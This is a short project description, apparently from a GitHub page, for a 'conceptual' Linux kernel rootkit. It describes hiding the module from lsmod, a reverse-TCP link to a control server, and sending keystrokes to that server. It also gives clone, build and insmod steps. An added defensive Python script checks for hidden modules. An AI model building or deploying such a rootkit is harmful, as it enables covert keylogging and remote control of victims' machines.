Concept-Rootkit - A simple conceptual Linux rootkit.

How it works:
– Hide the module:
+ Option 1: Overwrite “lsmod”.
+ Option 2: Delete the “rootkit” entry from the module list.
– Configure rootkit to be a client.
+ Will connect to the control-server on the 192.168.1.0/24 subnet.
+ This connection is, thus, a reverse-TCP connection.
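A defender-side check for the two hiding options above, as an added example that is not part of the Concept-Rootkit project: it reads /proc/modules directly instead of trusting the lsmod binary, and flags loadable modules that still have a /sys/module entry but are missing from the module list. It assumes the module only removes itself from the list and leaves its sysfs entry in place (the page does not say how the deletion is done); the function names and the sample tree are constructed for illustration.

```python
import os
import tempfile

def listed_modules(proc_modules_path="/proc/modules"):
    """Module names in the kernel's module list (the data lsmod prints)."""
    with open(proc_modules_path) as fh:
        return {line.split()[0] for line in fh if line.strip()}

def sysfs_loadable_modules(sysfs_root="/sys/module"):
    """Names under sysfs that carry an 'initstate' file.
    Built-in components have no such file, so they are skipped."""
    return {
        name for name in os.listdir(sysfs_root)
        if os.path.isfile(os.path.join(sysfs_root, name, "initstate"))
    }

def hidden_module_candidates(proc_modules_path="/proc/modules",
                             sysfs_root="/sys/module"):
    """Loadable modules visible in sysfs but absent from the module list.
    A module loading or unloading between the two reads can cause a
    transient mismatch, so treat hits as candidates and re-check."""
    return sorted(sysfs_loadable_modules(sysfs_root)
                  - listed_modules(proc_modules_path))

def demo():
    """Constructed sample: 'rootkit' exists in sysfs but is not listed."""
    with tempfile.TemporaryDirectory() as base:
        sysfs = os.path.join(base, "sys_module")
        for name, loadable in (("ext4", True), ("rootkit", True),
                               ("kernel", False)):  # 'kernel' is built-in
            os.makedirs(os.path.join(sysfs, name))
            if loadable:
                with open(os.path.join(sysfs, name, "initstate"), "w") as fh:
                    fh.write("live\n")
        proc = os.path.join(base, "proc_modules")
        with open(proc, "w") as fh:
            fh.write("ext4 1048576 1 - Live 0x0000000000000000\n")
        return hidden_module_candidates(proc, sysfs)

if __name__ == "__main__":
    print("constructed sample:", demo())
    if os.path.exists("/proc/modules") and os.path.isdir("/sys/module"):
        print("this host:", hidden_module_candidates())
```

An empty result does not prove a host is clean: a module that also removes its sysfs entry will not show up in this comparison.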

Rootkit dot ko listeners

With the following functions:
– Send keyboard buffer to control server.
– Add network-listening functionality.
– Filter out “ACK” numbers from TCP packets.

Usage:
* START: $> insmod rootkit.ko
* STOP : $> rmmod rootkit

Installation:
git clone https://github.com/AIPSec/Concept-Rootkit
cd Concept-Rootkit/src
make

Source: https://github.com/AIPSec